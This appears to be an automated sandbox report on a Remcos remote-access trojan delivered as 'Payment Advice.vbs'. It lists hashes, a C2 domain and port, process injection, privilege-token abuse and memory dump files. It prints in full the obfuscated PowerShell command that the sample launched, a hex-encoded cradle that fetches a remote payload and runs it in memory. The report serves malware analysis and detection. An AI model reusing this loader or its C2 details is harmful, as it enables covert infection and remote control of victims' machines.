remcos | 6f4f4f4b980e471c5f8f5d0d95bff5a7ec98e3e2377f18f7fc0d44828cbe33a6

General

Target

Payment Advice.vbs
Size

4KB
MD5

afccc71a981fa3ea99bf0af6cbbfac4d
SHA1

125e81caad716d88d4be375c125156a673d1ecb0
SHA256

6f4f4f4b980e471c5f8f5d0d95bff5a7ec98e3e2377f18f7fc0d44828cbe33a6
SHA512

0ea2d841cb7f3a55a6304b1784adecc7e87aa43676583c67084dafe2d702267165873031ac3fd2f5e7aced18aba36a6a5283b03eca2cb754a75fb0ce65955fdd

Score

10^/10

remcos ransomware rat

Malware Config

Extracted

Family

remcos

C2

creditdept01.myq-see.com:6800

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

8 316 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
ransomware

System Information Discovery
T1082
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 316 set thread context of 1576 316 powershell.exe powershell_ise.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

316 powershell.exe
316 powershell.exe

flow	pid	process
8	316	powershell.exe

description	pid	process	target process
PID 316 set thread context of 1576	316	powershell.exe	powershell_ise.exe

pid	process
316	powershell.exe
316	powershell.exe

Suspicious use of AdjustPrivilegeToken 41 IoCs

Processes:

powershell.exe

description	pid	process
Token: SeDebugPrivilege	316	powershell.exe
Token: SeIncreaseQuotaPrivilege	316	powershell.exe
Token: SeSecurityPrivilege	316	powershell.exe
Token: SeTakeOwnershipPrivilege	316	powershell.exe
Token: SeLoadDriverPrivilege	316	powershell.exe
Token: SeSystemProfilePrivilege	316	powershell.exe
Token: SeSystemtimePrivilege	316	powershell.exe
Token: SeProfSingleProcessPrivilege	316	powershell.exe
Token: SeIncBasePriorityPrivilege	316	powershell.exe
Token: SeCreatePagefilePrivilege	316	powershell.exe
Token: SeBackupPrivilege	316	powershell.exe
Token: SeRestorePrivilege	316	powershell.exe
Token: SeShutdownPrivilege	316	powershell.exe
Token: SeDebugPrivilege	316	powershell.exe
Token: SeSystemEnvironmentPrivilege	316	powershell.exe
Token: SeRemoteShutdownPrivilege	316	powershell.exe
Token: SeUndockPrivilege	316	powershell.exe
Token: SeManageVolumePrivilege	316	powershell.exe
Token: 33	316	powershell.exe
Token: 34	316	powershell.exe
Token: 35	316	powershell.exe
Token: SeIncreaseQuotaPrivilege	316	powershell.exe
Token: SeSecurityPrivilege	316	powershell.exe
Token: SeTakeOwnershipPrivilege	316	powershell.exe
Token: SeLoadDriverPrivilege	316	powershell.exe
Token: SeSystemProfilePrivilege	316	powershell.exe
Token: SeSystemtimePrivilege	316	powershell.exe
Token: SeProfSingleProcessPrivilege	316	powershell.exe
Token: SeIncBasePriorityPrivilege	316	powershell.exe
Token: SeCreatePagefilePrivilege	316	powershell.exe
Token: SeBackupPrivilege	316	powershell.exe
Token: SeRestorePrivilege	316	powershell.exe
Token: SeShutdownPrivilege	316	powershell.exe
Token: SeDebugPrivilege	316	powershell.exe
Token: SeSystemEnvironmentPrivilege	316	powershell.exe
Token: SeRemoteShutdownPrivilege	316	powershell.exe
Token: SeUndockPrivilege	316	powershell.exe
Token: SeManageVolumePrivilege	316	powershell.exe
Token: 33	316	powershell.exe
Token: 34	316	powershell.exe
Token: 35	316	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

powershell_ise.exe

pid process

1576 powershell_ise.exe

pid	process
1576	powershell_ise.exe

Suspicious use of WriteProcessMemory 17 IoCs

Processes:

WScript.exepowershell.exe

description	pid	process	target process
PID 1652 wrote to memory of 316	1652	WScript.exe	powershell.exe
PID 1652 wrote to memory of 316	1652	WScript.exe	powershell.exe
PID 1652 wrote to memory of 316	1652	WScript.exe	powershell.exe
PID 1652 wrote to memory of 1676	1652	WScript.exe	cmd.exe
PID 1652 wrote to memory of 1676	1652	WScript.exe	cmd.exe
PID 1652 wrote to memory of 1676	1652	WScript.exe	cmd.exe
PID 316 wrote to memory of 1576	316	powershell.exe	powershell_ise.exe
PID 316 wrote to memory of 1576	316	powershell.exe	powershell_ise.exe
PID 316 wrote to memory of 1576	316	powershell.exe	powershell_ise.exe
PID 316 wrote to memory of 1576	316	powershell.exe	powershell_ise.exe
PID 316 wrote to memory of 1576	316	powershell.exe	powershell_ise.exe
PID 316 wrote to memory of 1576	316	powershell.exe	powershell_ise.exe
PID 316 wrote to memory of 1576	316	powershell.exe	powershell_ise.exe
PID 316 wrote to memory of 1576	316	powershell.exe	powershell_ise.exe
PID 316 wrote to memory of 1576	316	powershell.exe	powershell_ise.exe
PID 316 wrote to memory of 1576	316	powershell.exe	powershell_ise.exe
PID 316 wrote to memory of 1576	316	powershell.exe	powershell_ise.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Payment Advice.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-PSReadlineOption -HistorySaveStyle SaveNothing;$RtTaPrCxkdwhsjhbPUin='Q4)QF)20)7B)24)70)Q9)QE)Q7)20)3D)20)74)QO)73)74)2D)Q3)QF)QE)QE)QO)Q3)74)Q9)QF)QE)20)2D)Q3)QF)QD)70)20)Q7)QF)QF)Q7)QC)QO)2E)Q3)QF)QD)20)2D)Q3)QF)7O)QE)74)20)31)20)2D)O1)7O)Q9)QO)74)7D)20)7O)QE)74)Q9)QC)20)28)24)70)Q9)QE)Q7)29)3B)24)74)3O)3Q)QQ)Q7)20)3D)20)OB)4O)QE)7O)QD)OD)3A)3A)O4)QF)4F)Q2)QA)QO)Q3)74)28)OB)O3)79)73)74)QO)QD)2E)4E)QO)74)2E)O3)QO)Q3)7O)72)Q9)74)79)O0)72)QF)74)QF)Q3)QF)QC)O4)79)70)QO)OD)2C)20)33)30)37)32)29)3B)OB)O3)79)73)74)QO)QD)2E)4E)QO)74)2E)O3)QO)72)7Q)Q9)Q3)QO)O0)QF)Q9)QE)74)4D)Q1)QE)Q1)Q7)QO)72)OD)3A)3A)O3)QO)Q3)7O)72)Q9)74)79)O0)72)QF)74)QF)Q3)QF)QC)20)3D)20)24)74)3O)3Q)QQ)Q7)3B)OB)O2)QO)QQ)OD)2E)41)73)73)QO)QD)Q2)QC)79)2E)47)QO)74)O4)79)70)QO)28)27)O3)79)27)2B)27)73)74)QO)QD)2E)27)2B)27)4D)Q1)QE)Q1)27)2B)27)Q7)QO)QD)27)2B)27)QO)QE)74)27)2B)27)2E)41)7O)74)QF)QD)27)2B)27)Q1)74)Q9)QF)27)2B)27)QE)2E)41)27)2B)27)QD)27)2B)27)73)Q9)27)2B)27)OO)74)Q9)QC)73)27)29)2E)47)QO)74)4Q)Q9)QO)QC)Q4)28)27)Q1)27)2B)27)QD)73)27)2B)27)Q9)49)27)2B)27)QE)Q9)74)4Q)Q1)27)2B)27)Q9)QC)QO)Q4)27)2C)27)4E)QF)QE)40)40)40)27)2E)72)QO)70)QC)Q1)Q3)QO)28)27)40)40)40)27)2C)27)O0)7O)Q2)27)29)2B)27)QC)Q9)Q3)2C)O3)27)2B)27)74)Q1)74)Q9)Q3)27)29)2E)O3)QO)74)OQ)Q1)QC)7O)QO)28)24)QE)7O)QC)QC)2C)24)74)72)7O)QO)29)3B)24)74)74)79)3D)27)28)4E)QO)77)2D)27)2B)27)4F)Q2)QA)QO)27)2B)27)Q3)74)20)4E)QO)27)2B)27)74)2E)O7)QO)27)2B)27)Q2)43)QC)Q9)27)2B)27)QO)QE)74)29)27)7C)49)Q0)4O)Q0)O8)3B)OB)7Q)QF)Q9)Q4)OD)20)OB)O3)79)73)74)QO)QD)2E)O2)QO)QQ)QC)QO)Q3)74)Q9)QF)QE)2E)41)73)73)QO)QD)Q2)QC)79)OD)3A)3A)4C)QF)Q1)Q4)O7)Q9)74)Q8)O0)Q1)72)74)Q9)Q1)QC)4E)Q1)QD)QO)28)27)4D)Q9)Q3)72)QF)73)QF)QQ)74)2E)OQ)Q9)73)7O)Q1)QC)42)Q1)73)Q9)Q3)27)29)3B)24)QD)7Q)3D)20)OB)4D)Q9)Q3)72)QF)73)QF)QQ)74)2E)OQ)Q9)73)7O)Q1)QC)42)Q1)73)Q9)Q3)2E)49)QE)74)QO)72)Q1)Q3)74)Q9)QF)QE)OD)3A)3A)43)Q1)QC)QC)42)79)QE)Q1)QD)QO)28)24)74)74)79)2C)27)44)QF)77)QE)QC)QF)Q1)Q4)O3)74)72)Q9)QE)Q7)27)2C)OB)4D)Q9)Q3)72)QF)73)QF)QQ)74)2E)OQ)Q9)73)7O)Q1)QC)42)Q1)73)Q9)Q3)2E)43)Q1)QC)QC)O4)79)70)QO)OD)3A)3A)4D)QO)74)Q8)QF)Q4)2C)27)Q8)74)74)70)3A)2F)2F)Q1)Q3)Q8)2D)QO)Q4)Q9)2E)78)79)7A)2F)4D)QF)QE)74)Q8)QC)79)O0)Q1)79)72)QF)QC)QC)2F)4A)Q1)QE)7O)Q1)72)79)2E)QA)70)Q7)27)29)3B)24)72)37)38)QQ)Q4)30)30)30)73)Q4)3D)20)24)QD)7Q)20)2D)73)70)QC)Q9)74)20)27)2O)27)20)7C)4Q)QF)72)4O)Q1)Q3)Q8)2D)4F)Q2)QA)QO)Q3)74)20)7B)OB)Q3)Q8)Q1)72)OD)OB)Q2)79)74)QO)OD)22)30)78)24)OF)22)7D)3B)24)79)3O)QA)Q8)3Q)32)Q4)QQ)30)3D)20)24)72)37)38)QQ)Q4)30)30)30)73)Q4)20)2D)QA)QF)Q9)QE)20)27)27)7C)49)Q0)4O)Q0)O8'.replace('O','5').replace('Q','6');$DFG45DFG0=$RtTaPrCxkdwhsjhbPUin.Split(')') | forEach {[char]([Convert]::toint16($_,16))};$DFG45DFG0 -join ''|& (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}))
2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:316

C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell_ise.exe
"C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell_ise.exe"
3⤵
- Suspicious use of SetWindowsHookEx
PID:1576

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\Payment Advice.vbs" "C:\Users\Admin\AppData\Local" /Y
2⤵
PID:1676

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/316-16-0x0000000002650000-0x0000000002651000-memory.dmp

Filesize
4KB

Download
memory/316-6-0x000007FEF5350000-0x000007FEF5D3C000-memory.dmp

Filesize
9.9MB

Download
memory/316-2-0x0000000000000000-mapping.dmp

Download
memory/316-35-0x00000000026A0000-0x00000000026A6000-memory.dmp

Filesize
24KB

Download
memory/316-28-0x0000000002740000-0x0000000002741000-memory.dmp

Filesize
4KB

Download
memory/316-7-0x0000000002090000-0x0000000002091000-memory.dmp

Filesize
4KB

Download
memory/316-8-0x000000001ACF0000-0x000000001ACF2000-memory.dmp

Filesize
8KB

Download
memory/316-29-0x0000000002750000-0x0000000002751000-memory.dmp

Filesize
4KB

Download
memory/316-10-0x0000000002560000-0x0000000002561000-memory.dmp

Filesize
4KB

Download
memory/316-11-0x000000001ACF4000-0x000000001ACF6000-memory.dmp

Filesize
8KB

Download
memory/316-12-0x00000000020D0000-0x00000000020D1000-memory.dmp

Filesize
4KB

Download
memory/316-13-0x0000000002610000-0x0000000002611000-memory.dmp

Filesize
4KB

Download
memory/316-4-0x000007FEFBEE1000-0x000007FEFBEE3000-memory.dmp

Filesize
8KB

Download
memory/316-34-0x0000000002690000-0x0000000002694000-memory.dmp

Filesize
16KB

Download
memory/316-9-0x000000001AD70000-0x000000001AD71000-memory.dmp

Filesize
4KB

Download
memory/316-30-0x000000001C680000-0x000000001C681000-memory.dmp

Filesize
4KB

Download
memory/316-31-0x000000001C360000-0x000000001C361000-memory.dmp

Filesize
4KB

Download
memory/316-32-0x000000001ACFA000-0x000000001AD19000-memory.dmp

Filesize
124KB

Download
memory/316-33-0x000000001B7A0000-0x000000001B7C1000-memory.dmp

Filesize
132KB

Download
memory/1576-37-0x0000000000413FA4-mapping.dmp

Download
memory/1576-38-0x0000000075571000-0x0000000075573000-memory.dmp

Filesize
8KB

Download
memory/1576-36-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/1576-39-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/1652-5-0x00000000026F0000-0x00000000026F4000-memory.dmp

Filesize
16KB

Download
memory/1676-3-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing